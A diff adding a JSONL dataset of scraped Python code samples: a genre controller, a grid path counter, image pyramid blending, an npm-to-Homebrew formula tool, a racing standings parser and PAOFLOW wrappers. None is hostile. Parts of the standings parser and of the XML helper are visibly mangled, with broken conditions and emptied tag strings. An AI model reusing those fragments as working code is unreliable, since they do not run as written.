diff --git "a/4286.jsonl" "b/4286.jsonl" new file mode 100644--- /dev/null +++ "b/4286.jsonl" @@ -0,0 +1,166 @@ +{"seq_id":"4475825159","text":"from entidade.genero import Genero\nfrom limite.tela_genero import TelaGenero\nfrom persistencia.genero_dao import GeneroDAO\n\nclass ControladorGenero: \n\n def __init__(self, controlador_livro): \n self.__tela_genero = TelaGenero()\n self.__controlador_livro = controlador_livro\n self.__manter_tela_aberta = True\n self.__dao = GeneroDAO()\n\n def naoexisteGenero(self, nome: str):\n naoexisteGenero = True\n genero_enviado = None\n\n for genero in self.__dao.get_all():\n if genero.nome == nome:\n naoexisteGenero = False\n genero_enviado = genero\n break\n if naoexisteGenero:\n novo_genero = Genero(nome)\n self.__dao.add(novo_genero)\n genero_enviado = novo_genero\n \n return genero_enviado\n \n def pega_nome(self, genero: Genero):\n nome = genero.nome\n return nome\n\n def alterar_genero_livro(self):\n naoexisteGenero = True\n nome = self.__tela_genero.altera_genero_livro()\n\n for genero in self.__dao.get_all():\n if genero.nome == nome:\n naoexisteGenero = False\n novo_genero = genero\n break\n if naoexisteGenero:\n novo_genero = Genero(nome)\n self.__dao.add(novo_genero)\n\n return novo_genero\n\n def abrir_tela_genero(self):\n self.__manter_tela_aberta = True\n lista_opcoes = {'Cadastrar Genero': self.cadastrar_genero, 'Alterar Genero': self.alterar_genero, 'Listar Generos': self.listar_generos, 'Remover Genero': self.remover_genero, 'Pesquisar Generos': self.pesquisar_generos, 'Voltar': self.fechar_tela_genero}\n while self.__manter_tela_aberta:\n opcao_escolhida = self.__tela_genero.menu_genero()\n try:\n funcao_escolhida = lista_opcoes[opcao_escolhida]\n except Exception:\n self.__tela_genero.aviso_erro()\n else:\n funcao_escolhida() \n\n self.__controlador_livro.abrir_tela_livro()\n\n def cadastrar_genero(self):\n naoexisteGenero = True\n nome = self.__tela_genero.cadastra_genero()\n \n if nome != None:\n for genero in self.__dao.get_all():\n if genero.nome == nome:\n naoexisteGenero = False\n break\n if naoexisteGenero:\n novo_genero = Genero(nome)\n self.__dao.add(novo_genero)\n \n self.abrir_tela_genero()\n\n def alterar_genero(self):\n existeGenero = False\n genero_alterado = self.__tela_genero.altera_genero()\n genero_encontrado = None\n\n for genero in self.__dao.get_all():\n if genero.nome == genero_alterado:\n existeGenero = True\n genero_encontrado = genero\n break\n if existeGenero:\n novo_nome = self.__tela_genero.alteracao()\n if novo_nome != None:\n self.__controlador_livro.sincronia_genero(genero_encontrado, novo_nome) \n genero_encontrado.nome = novo_nome\n else:\n self.abrir_tela_genero()\n \n self.abrir_tela_genero()\n\n def listar_generos(self):\n generos = []\n\n for genero in self.__dao.get_all():\n generos.append(genero.nome)\n\n genero_escolhido = self.__tela_genero.lista_generos(generos)\n \n if genero_escolhido == 'Voltar':\n self.abrir_tela_genero()\n\n def mostrar_genero(self, genero_escolhido):\n existeGenero = False \n dados_genero = {}\n genero_encontrado = None\n\n for genero in self.__dao.get_all():\n if genero.nome == genero_escolhido:\n existeGenero = True\n genero_encontrado = genero\n break\n if existeGenero:\n nome = genero_encontrado.nome\n dados_genero = {'nome': nome}\n self.__tela_genero.mostra_genero(dados_genero)\n \n self.abrir_tela_genero()\n \n def remover_genero(self):\n existeGenero = False\n nome = self.__tela_genero.remove_genero()\n genero_encontrado = None\n\n if nome != None:\n for genero 
in self.__dao.get_all():\n if genero.nome == nome:\n existeGenero = True\n genero_encontrado = genero\n break\n if existeGenero:\n self.__controlador_livro.remove_genero(nome)\n self.__dao.remove(genero_encontrado)\n else:\n self.__tela_genero.aviso_erro()\n\n self.abrir_tela_genero() \n\n def pesquisar_generos(self):\n self.__manter_tela_aberta = True\n lista_opcoes = {'Pesquisar Livros do Genero': self.pesquisar_titulo, 'Pesquisar Autores do Genero': self.pesquisar_autores, 'Voltar': self.fechar_tela_genero}\n while self.__manter_tela_aberta:\n opcao_escolhida = self.__tela_genero.pesquisa_generos()\n try:\n funcao_escolhida = lista_opcoes[opcao_escolhida]\n except Exception:\n self.__tela_genero.aviso_erro()\n else:\n funcao_escolhida() \n\n self.abrir_tela_genero()\n \n def pesquisar_titulo(self):\n self.__controlador_livro.pesquisar_genero_livros()\n\n def pesquisar_autores(self):\n self.__controlador_livro.pesquisar_genero_autores()\n\n def fechar_tela_genero(self):\n self.__manter_tela_aberta = False\n\n def genero_deletado(self):\n nome = 'Autor Deletado'\n genero_deletado = Genero(nome)\n\n return genero_deletado\n","repo_name":"Sirgubler/Trabalho_DSOO","sub_path":"controle/controlador_genero.py","file_name":"controlador_genero.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"26416823682","text":"import time\r\ncord = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]\r\n\r\n\r\ndef main():\r\n\t# global path\r\n\t# global count\r\n\t# global matrix\r\n\t# global inform0\r\n\t# global inform1\r\n\t# global inform\r\n\t# global path_char\r\n\tpath_size = int(input())\r\n\r\n\tstart_time = time.time()\r\n\tpath = input()\r\n\tpath_char = {}\r\n\r\n\tmatrix = []\r\n\tfor i in range(8):\r\n\t\tmatrix.append(input())\r\n\r\n\tfor index in range(len(path)):\r\n\t\tif path[index] in path_char:\r\n\t\t\tpath_char[path[index]].append(index)\r\n\t\telse:\r\n\t\t\tpath_char[path[index]] = [index]\r\n\t# print(path_char)\r\n\r\n\tcount = 0\r\n\t# Making list of paths(set of coordinates) at every block of inform matrix\r\n\tinform = [[{} for i in range(8)] for j in range(8)]\r\n\tinform0 = [[[] for i in range(8)] for j in range(8)]\r\n\tinform1 = [[[] for i in range(8)] for j in range(8)]\r\n\r\n\tfor i in range(8):\r\n\t\tfor j in range(8):\r\n\t\t\tif matrix[i][j] in path_char:\r\n\t\t\t\t# print('for i and j:', i, j)\r\n\t\t\t\tfor num in range(8):\r\n\t\t\t\t\tx = i + cord[num][0]\r\n\t\t\t\t\ty = j + cord[num][1]\r\n\t\t\t\t\tif 0 <= x < 8 and 0 <= y < 8:\r\n\t\t\t\t\t\tif matrix[x][y] in path_char:\r\n\t\t\t\t\t\t\t# print('in bound x,y:', x, y)\r\n\t\t\t\t\t\t\t# print('38:', 'matchar:', matrix[x][y],'returned list of index', path_char.get(matrix[x][y]))\r\n\t\t\t\t\t\t\tfor index in path_char[matrix[i][j]]:\r\n\t\t\t\t\t\t\t\tif index == len(path) - 1:\r\n\t\t\t\t\t\t\t\t\tcontinue # Need to put break\r\n\t\t\t\t\t\t\t\t# print('Inner index:', index, 'from', path_char[matrix[i][j]])\r\n\t\t\t\t\t\t\t\tfor outer_index in path_char[matrix[x][y]]:\r\n\t\t\t\t\t\t\t\t\t# print('Outer Index:', outer_index, 'from', path_char[matrix[x][y]])\r\n\t\t\t\t\t\t\t\t\tif outer_index == index + 1:\r\n\t\t\t\t\t\t\t\t\t\t# print(\"Yes I'm in.\")\r\n\t\t\t\t\t\t\t\t\t\t# print('Inform:', i, j, inform[i][j])\r\n\t\t\t\t\t\t\t\t\t\tif index in inform[i][j]:\r\n\t\t\t\t\t\t\t\t\t\t\tinform[i][j][index].append((x, 
y))\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tinform[i][j][index] = [(x, y)]\r\n\t\t\t\t\t\t\t\t\t\t# print('Inform:', i, j, inform[i][j])\r\n\t\t\t\t\t\t\t\t\t\tbreak\r\n\t# print(inform)\r\n\r\n\talternate = False\r\n\t# parent_index = 0\r\n\tfor index in range(path_size):\r\n\t\tfor i in range(8):\r\n\t\t\tfor j in range(8): # index-1 is parent index(inner index)\r\n\t\t\t\tif index in path_char.get(matrix[i][j], []):\r\n\t\t\t\t\t# print('for i and j:', i, j, 'index:', index)\r\n\t\t\t\t\tif index is 0 and 0 in inform[i][j]:\r\n\t\t\t\t\t\tfor outer_cord in inform[i][j][0]:\r\n\t\t\t\t\t\t\tinform0[outer_cord[0]][outer_cord[1]].append({(i, j)})\r\n\t\t\t\t\t\t\t# print('for i and j:', i, j, 'index:', index, 'outer_cord:', outer_cord)\r\n\t\t\t\t\telif index < path_size-2 and index in inform[i][j]:\r\n\t\t\t\t\t\tfor outer_cord in inform[i][j][index]:\r\n\t\t\t\t\t\t\tif alternate:\r\n\t\t\t\t\t\t\t\tfor current_path in inform0[i][j]:\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tano = current_path.copy()\r\n\t\t\t\t\t\t\t\t\t\tano.add((i, j))\r\n\t\t\t\t\t\t\t\t\t\tinform1[outer_cord[0]][outer_cord[1]].append(ano)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tfor current_path in inform1[i][j]:\r\n\t\t\t\t\t\t\t\t\t# print(current_path)\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tano = current_path.copy()\r\n\t\t\t\t\t\t\t\t\t\tano.add((i, j))\r\n\t\t\t\t\t\t\t\t\t\tinform0[outer_cord[0]][outer_cord[1]].append(ano)\r\n\t\t\t\t\t\t\t\t\t\t# print(\"Inside for Loop\", 'Index:', index, 'cord', (x, y), inform0[x][y])\r\n\t\t\t\t\telif index in inform[i][j]:\r\n\t\t\t\t\t\tfor outer_cord in inform[i][j][index]:\r\n\t\t\t\t\t\t\tif alternate:\r\n\t\t\t\t\t\t\t\tfor current_path in inform0[i][j]:\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tcount += 1\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tfor current_path in inform1[i][j]:\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tcount += 1\r\n\t\t# for iter in range(8):\r\n\t\t# \tprint('index: ', index, 'Row:', iter, inform1[iter]) if alternate else print('index: ', index, 'Row:', iter, inform0[iter])\r\n\t\tif alternate:\r\n\t\t\tinform0 = [[[] for i in range(8)] for j in range(8)]\r\n\t\telse:\r\n\t\t\tinform1 = [[[] for i in range(8)] for j in range(8)]\r\n\t\talternate = not alternate\r\n\r\n\t# Here information matrix is created\r\n\t# for\r\n\r\n\tprint(count)\r\n\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n\r\n'''\r\n3\r\nfit\r\nfitfpoke\r\norlignom\r\nifefmart\r\ntforarts\r\ntekkenth\r\nrichieri\r\ntintinti\r\npikachup\r\n\r\n3\r\nfit\r\nfitfpoke\r\norlignom\r\nifefmirt\r\ntforarfs\r\ntekkenth\r\nrichieri\r\ntintinti\r\npikachup\r\n\r\n8\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\n\r\n___\r\n4 a's\r\n14196\r\n--- 0.01604151725769043 seconds ---\r\n5 a's\r\n77016\r\n--- 0.08420968055725098 seconds ---\r\n6 a's\r\n408764\r\n--- 0.47322750091552734 seconds ---\r\n7 a's\r\n2129440\r\n--- 3.296757459640503 seconds ---\r\n___\r\n8-as\r\n10899404\r\n--- 15.309681177139282 seconds ---\r\n\r\n'''","repo_name":"VivekKrG/Python-3-Practice-Problems-and-Solutions","sub_path":"Jio code Gladitor TechGig/dec improved 3.py","file_name":"dec improved 
3.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"41823572723","text":"import imageio\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.transform import pyramid_reduce, pyramid_expand\nimport cv2\nfrom packaging import version\nimport skimage\n\ndef plot_pyramid(pyramid):\n \"\"\"\n Create and plot a stitched image of a pyramid\n\n Args:\n pyramid : Pyramid array to be plotted\n \"\"\"\n# if(pyramid[0].shape[0] < pyramid[len(pyramid)-1].shape[0]):\n# pyramid = pyramid[::-1]\n rows, cols, dim = pyramid[0].shape\n composite_image = np.zeros((rows, cols + cols // 2, 3), dtype=np.double)\n composite_image[:rows, :cols, :] = pyramid[0]\n\n i_row = 0\n for p in pyramid[1:]:\n n_rows, n_cols = p.shape[:2]\n composite_image[i_row:i_row + n_rows, cols:cols + n_cols] = p\n i_row += n_rows\n fig, ax = plt.subplots()\n\n ax.imshow(composite_image)\n plt.show()\n\n\ndef get_gaussian_pyramid(img,downscale=2,**kwargs):\n \"\"\"\n Get the gaussian pyramid of an image\n\n Args:\n img : Image to make a laplacian pyramid off.\n Downscale (int, optional): Downscale value. Defaults to 2.\n\n Returns:\n G_pyramid: Array of gaussian pyramid images\n \"\"\"\n row = img.shape[0]\n column = img.shape[1]\n G_pyramid = []\n var = img/255\n\n while row > 8 and column > 8:\n G_pyramid.append(var)\n if version.parse(skimage.__version__) < version.parse(\"0.19.0\"): # elke foto toegevoegd aan ims array\n var = pyramid_reduce(var, downscale=downscale, multichannel=True) \n else: \n var = pyramid_reduce(var, downscale=downscale, channel_axis=2)\n row = row/2\n column = column/2\n G_pyramid.append(var)\n return G_pyramid\n\n\ndef get_laplacian_pyramid(img,upscale=2, **kwargs):\n \"\"\"\n Get the laplacian pyramid from an image's gaussian pyramid or the image itself\n\n Args:\n img : Image to make a laplacian pyramid off.\n upscale (int, optional): Upscale value for gaussian pyramid. 
Defaults to 2.\n\n Returns:\n L_pyramid: Array of laplacian pyramid images\n \"\"\"\n pyramid = get_gaussian_pyramid(img,upscale=upscale)\n L_pyramid = []\n for i in range(len(pyramid)-1,-1,-1):\n if i == len(pyramid)-1:\n L_pyramid.append(pyramid[i])\n else:\n if version.parse(skimage.__version__) < version.parse(\"0.19.0\"): # elke foto toegevoegd aan ims array\n prev = pyramid_expand(pyramid[i+1],upscale=upscale, multichannel=True) \n else: \n prev = pyramid_expand(pyramid[i+1],upscale=upscale, channel_axis=2)\n L_pyramid.append(cv2.resize(pyramid[i],dsize=(prev.shape[1],prev.shape[0]),interpolation=cv2.INTER_CUBIC)-prev)\n L_pyramid=L_pyramid[::-1]\n return L_pyramid\n\ndef reconstruct_image_from_laplacian_pyramid(pyramid):\n \"\"\"\n Reconstruct an image from its laplacian pyramid\n\n Args:\n pyramid : Laplacian pyramid to be reconstructed\n\n Returns:\n R[len(R)-1]: The reconstructed image from the laplacian pyramid\n \n \"\"\"\n R = []\n #loop through the pyramid from the bottom to the top\n for i in range(len(pyramid)-1,-1,-1):\n if i == len(pyramid)-1:\n R.append(pyramid[len(pyramid)-1])\n else:\n #Rescale -> vanaf versie skimage v0.19 is multichannel veranderd naar channel_axis\n if version.parse(skimage.__version__) < version.parse(\"0.19.0\"): # elke foto toegevoegd aan ims array\n prev = pyramid_expand(R[len(pyramid)-2-i], multichannel=True) \n else: \n prev = pyramid_expand(R[len(pyramid)-2-i], channel_axis=2)\n R.append(cv2.resize(pyramid[i],dsize=(prev.shape[1],prev.shape[0]),interpolation=cv2.INTER_CUBIC)+prev)\n return R[len(R)-1]\n\n\ndef pyramid_blend(gmask,limg1,limg2):\n \"\"\"\n Blend 2 laplacian pyramid images using gmask (gaussian pyramid mask)\n\n Args:\n gmask Gaussian pyramid: Gaussian pyramid of mask\n limg1 Laplacian pyramid: laplacian pyramid of 1st image \n limg2 Laplacian pyramid: laplacian pyramid of 2nd image\n\n Returns:\n image array: Blended image\n \"\"\"\n\n blend = []\n\n for i in range(0,len(gmask)):\n gmaskT = cv2.resize(gmask[i],dsize=(limg1[i].shape[1],limg1[i].shape[0]),interpolation=cv2.INTER_CUBIC)\n blend.append(((1-gmaskT)*limg1[i])+(gmaskT*limg2[i]))\n blended = reconstruct_image_from_laplacian_pyramid(blend)\n\n return blended\n\nif __name__ == \"__main__\":\n image_folder = \"././imgs/faces/\"\n img_name = \"superman.jpg\"\n img = imageio.imread(image_folder+img_name)\n plt.figure()\n plt.imshow(img)\n plt.show()\n\n plot_pyramid(get_gaussian_pyramid(img))\n plot_pyramid(get_laplacian_pyramid(img))\n plt.imshow(reconstruct_image_from_laplacian_pyramid(get_laplacian_pyramid(img)))\n plt.show()","repo_name":"michielgoethals/digital_image_processing","sub_path":"Opdrachten/Geometric Transformations/pyramidBlending.py","file_name":"pyramidBlending.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"19831768110","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\nfrom .package import Package\nfrom .util import logger, formula_path, turn_on_debug_logging\nfrom .version import __version__\n\n\ndef main():\n description = \"\"\"\\\n Generate a Homebrew formula for an npm package. By default the\n generated formula is printed to stdout. 
If -w, --write is specified,\n the formula is directly written to the specified tap, or\n homebrew/core if no tap is specified.\n \"\"\"\n parser = argparse.ArgumentParser(prog=\"noob\", description=description)\n add = parser.add_argument\n add(\"package\", help=\"name of the package on npm\")\n add(\n \"-w\",\n \"--write\",\n action=\"store_true\",\n help=\"write to filesystem instead of stdout\",\n )\n add(\n \"-t\",\n \"--tap\",\n default=\"homebrew/core\",\n help=\"if writing to filesystem, write to this tap instead of homebrew/core\",\n )\n add(\"-v\", \"--version\", action=\"version\", version=__version__)\n add(\"--debug\", action=\"store_true\")\n args = parser.parse_args()\n\n debug = args.debug\n if debug:\n turn_on_debug_logging()\n\n try:\n if args.write:\n path = formula_path(args.tap, args.package)\n\n package = Package(args.package)\n if args.write:\n with open(path, \"w\") as fp:\n fp.write(package.formula)\n print(\"Formula written to %s\" % path)\n else:\n sys.stdout.write(package.formula)\n except Exception as e:\n logger.error(\"%s: %s\", type(e).__name__, e)\n if debug:\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/homebrew-npm-noob","sub_path":"noob/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"56"} +{"seq_id":"7919199948","text":"'''\r\nCreated on Apr 29, 2017\r\n \r\n@author: Ernesto\r\n \r\nThis module can currently collect the names and finishing positions from a NR2003 export file\r\nTo add:\r\nMulti-race support -- Added\r\nPoints calculator\r\nStandings rank and output\r\nIndication of laps led -- Added?\r\nLoad from a file (probably better for a different module)\r\n'''\r\n \r\n \r\nimport sys\r\nfrom pathlib import Path\r\n \r\n \r\nclass Driver():\r\n def __init__(self, name, finishes, number, led):\r\n self.name = name\r\n self.finishes = finishes\r\n self.number = number\r\n self.points = 0\r\n #This list should be values of 0/1/2 for every race\r\n #0 = no laps led, 1 = laps led, 2 = most laps led\r\n self.led = led\r\n \r\n \r\n \r\n \r\n \r\n \r\ndef standings_single_race(standings, race_file, game_dir):\r\n #\r\n f = open(race_file , mode = 'r')\r\n fcontent = f.readlines()\r\n \r\n def get_finish_order(fcontent, n):\r\n if \"OFFICIAL STANDINGS\" in fcontent[n]:\r\n return fcontent[n:]\r\n else:\r\n return get_finish_order(fcontent, n + 1) \r\n \r\n def remove_penalties(fcontent, n):\r\n #This barely works, but it works\r\n if \"PENALTIES\" in fcontent[n]:\r\n \r\n return fcontent[:n + 16]\r\n else:\r\n \r\n return remove_penalties(fcontent, n + 1) \r\n \r\n sys.setrecursionlimit(2000)\r\n fcontent = get_finish_order(fcontent, 0)\r\n fcontent = remove_penalties(fcontent, 0)\r\n \r\n \"\"\"\r\n parser = HTMLDrivers()\r\n parser.feed(\"\".join(fcontent))\r\n \"\"\"\r\n \r\n raceresults = []\r\n \r\n for i in range(0, len(fcontent)):\r\n #Driver\r\n if \" 0:\r\n raceresults.append(\"1\")\r\n except:\r\n if \"*\" in fcontent[i + 1]:\r\n raceresults.append('2')\r\n \r\n \r\n \r\n raceresults = raceresults[3:-2]\r\n \r\n \r\n \r\n for j in range(0, len(raceresults) - 3):\r\n d = Driver(number = raceresults[j + 1].strip(), finishes = [raceresults[j].strip()], name = raceresults[j + 2].strip(), led = [raceresults[j + 3]])\r\n try:\r\n int(d.name)\r\n continue\r\n except:\r\n if d.name == 'LAP' or d.name == 'INFRACTION':\r\n continue\r\n pass\r\n \r\n \r\n d_exists = False\r\n \r\n \r\n for k in 
standings:\r\n \r\n if k.name == d.name and k.number == d.number:\r\n k.finishes.append(d.finishes[0])\r\n k.led.append(d.led[0])\r\n d_exists = True\r\n break\r\n \r\n \r\n if not d_exists:\r\n standings.append(d)\r\n \r\n \r\n return standings","repo_name":"ernesto241/NR2003-Points-Calculator","sub_path":"nr2003_standings_update.py","file_name":"nr2003_standings_update.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"3427881867","text":"import AFLOWpi.prep\nimport os\nimport numpy as np \nimport re\nimport itertools\nimport shutil\nimport glob\nimport subprocess as sp\n\ndef _run_paopy(oneCalc,ID,acbn0=False,exec_prefix=\"\"):\n \n paopy_path = os.path.join(AFLOWpi.__path__[0],'PAOFLOW/examples/','main.py')\n\n try:\n shutil.copy(paopy_path,oneCalc['_AFLOWPI_FOLDER_'])\n except Exception as e:\n AFLOWpi.run._fancy_error_log(e)\n AFLOWpi.run._fancy_error_log(\"PAOFLOW did mot run properly. Exiting.\") \n raise SystemExit\n\n paopy_path = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'main.py')\n\n if exec_prefix==\"\":\n\n if acbn0:\n execPrefix = AFLOWpi.prep._ConfigSectionMap('run','exec_prefix_serial')\n else:\n execPrefix = AFLOWpi.prep._ConfigSectionMap(\"run\",\"exec_prefix\")\n\n else:\n execPrefix=exec_prefix\n\n paopy_output = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'%s_PAOFLOW.out'%ID)\n\n py_comm = AFLOWpi.prep._ConfigSectionMap('run','python_command')\n if py_comm==\"\":\n py_comm=\"python\"\n\n\n paopy_input = '%s inputfile.xml'%oneCalc['_AFLOWPI_FOLDER_']\n try:\n command = '%s %s -u %s %s > %s %s' % (execPrefix,py_comm,paopy_path,paopy_input,paopy_output,\n acbn0)\n print(command)\n\n\n proc = sp.run(command,shell=True)\n\n return_code = proc.returncode\n\n if return_code!=0:\n AFLOWpi.run._fancy_error_log(e)\n AFLOWpi.run._fancy_error_log(\"PAOFLOW did mot run properly. Exiting.\") \n raise SystemExit\n\n except Exception as e:\n AFLOWpi.run._fancy_error_log(e)\n AFLOWpi.run._fancy_error_log(\"PAOFLOW did mot run properly. 
Exiting.\") \n raise SystemExit\n\ndef PAOFLOW_DATA_CONV(oneCalc,ID):\n try:\n AFLOWpi.prep._convert_tb_pdos(oneCalc,ID)\n except: pass\n try:\n AFLOWpi.prep._convert_tb_pdos(oneCalc,ID,-1) \n except: pass\n try:\n AFLOWpi.prep._convert_tb_pdos(oneCalc,ID,1) \n except: pass\n try:\n AFLOWpi.prep._combine_pol_pdos(oneCalc,ID)\n except: pass\n try:\n AFLOWpi.scfuj._rename_boltz_files(oneCalc,ID)\n except: pass\n try:\n AFLOWpi.scfuj._rename_hall_files(oneCalc,ID) \n except: pass\n try:\n AFLOWpi.scfuj._rename_bands_files(oneCalc,ID)\n except: pass\n\n\ndef paopy_header_wrapper(calcs,shift_type=1,shift='auto',thresh=0.90,tb_kp_mult=4,smearing=None,emin=-5.0,emax=5.0,ne=1000,symmetrize=False,sym_thr=1.e-6,sym_max_iter=20):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_header(oneCalc,ID,shift_type=%s,shift='auto',thresh=%s,tb_kp_mult=%s,smearing=%s,emin=%s,emax=%s,ne=%s,symmetrize=%s,sym_thr=%s,sym_max_iter=%s)\"\"\" % (shift_type,thresh,tb_kp_mult,repr(smearing),emin,emax,ne,symmetrize,sym_thr,sym_max_iter)\n \n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_spin_Hall_wrapper(calcs,s_tensor,spin_texture=False):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_spin_Hall(oneCalc,ID,%s,spin_texture=%s)\"\"\"%(repr(s_tensor),spin_texture)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\ndef paopy_Berry_wrapper(calcs,a_tensor):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_Berry(oneCalc,ID,%s)\"\"\"%repr(a_tensor)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_dos_wrapper(calcs,fermi_surf=False):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_dos(oneCalc,ID,fermi_surf=%s)\"\"\"%fermi_surf\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\n\ndef paopy_pdos_wrapper(calcs):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_pdos(oneCalc,ID)\"\"\"\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_bands_wrapper(calcs,band_topology=True,fermi_surface=False,ipol=0,jpol=1,spol=2,nk=1000):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_bands(oneCalc,ID,topology=%s,ipol=%s,jpol=%s,spol=%s,nk=%s)\"\"\"%(band_topology,ipol,jpol,spol,nk)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_transport_wrapper(calcs,t_tensor,t_min,t_max,t_step,carr_conc=False):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_transport(oneCalc,ID,%s,t_min=%s,t_max=%s,t_step=%s,carr_conc=%s)\"\"\"%(repr(t_tensor),t_min,t_max,t_step,carr_conc)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\n\n\ndef paopy_optical_wrapper(calcs,d_tensor):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_optical(oneCalc,ID,%s)\"\"\"%repr(d_tensor)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\ndef paopy_acbn0_wrapper(calcs):\n pass\n\n\n\n\n\ndef _add_paopy_xml(filename,var_name,var_type,var_val,degree=0): \n\n with open(filename,'r') as ifo: \n lines=ifo.readlines()\n \n var_size=1\n if degree==2:\n tensor = '\\t<%s>\\n'%var_name\n for i in range(len(var_val)):\n tensor+='\\t\\t%s\\n'%(var_type,len(var_val[i]),' '.join(map(str,var_val[i])))\n tensor+=\"\\t\"%var_name\n lines[-1]=tensor \n elif degree==1:\n var_size = len(var_val)\n var_val = ' '.join(map(str,var_val))\n lines[-1]='\\t<%s>%s'%(var_name,var_type,var_size,var_val,var_name) \n else:\n lines[-1]='\\t<%s type=\"%s\" size=\"%s\">%s'%(var_name,var_type,var_size,var_val,var_name) \n lines.extend(['\\n']) \n outstr = ''.join(lines) \n with open(filename,'w') as ofo: \n ofo.write(outstr)\n\n\ndef 
_add_paopy_header(oneCalc,ID,shift_type=1,shift='auto',thresh=0.90,tb_kp_mult=4,acbn0=False,ovp=False,smearing=None,emin=-5.0,emax=5.0,ne=1000,symmetrize=False,sym_thr=1.e-6,sym_max_iter=20):\n \n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n ibrav=oneCalc['_AFLOWPI_ORIG_IBRAV_']\n \n nk1,nk2,nk3 = AFLOWpi.scfuj._mult_kgrid(oneCalc,mult=tb_kp_mult)\n\n blank = '''\n\n'''\n\n with open(paopy_input,'w') as ifo:\n ifo.write(blank)\n \n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'fpath','character','%s_TB.save'%ID)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'smearing','character',smearing)\n\n if shift==\"auto\":\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'shift','character',\"auto\")\n else:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'shift','decimal',shift)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'shift_type','int',shift_type)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ibrav','int',ibrav)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'pthr','decimal',thresh)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'verbose','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'npool','int',1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'delta','decimal',0.1)\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ne','int',ne)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emin','decimal',emin)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emax','decimal',emax)\n\n\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'double_grid','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nfft1','int',nk1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nfft2','int',nk2)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nfft3','int',nk3)\n\n if symmetrize:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'symmetrize','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'symm_max_iter','int',sym_max_iter)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'symm_thresh','decimal',\"%6.4e\"%sym_thr)\n\n\n if acbn0==True:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'expand_wedge','logical','F')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'write2file','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'write_binary','logical','T')\n if ovp==True:\n 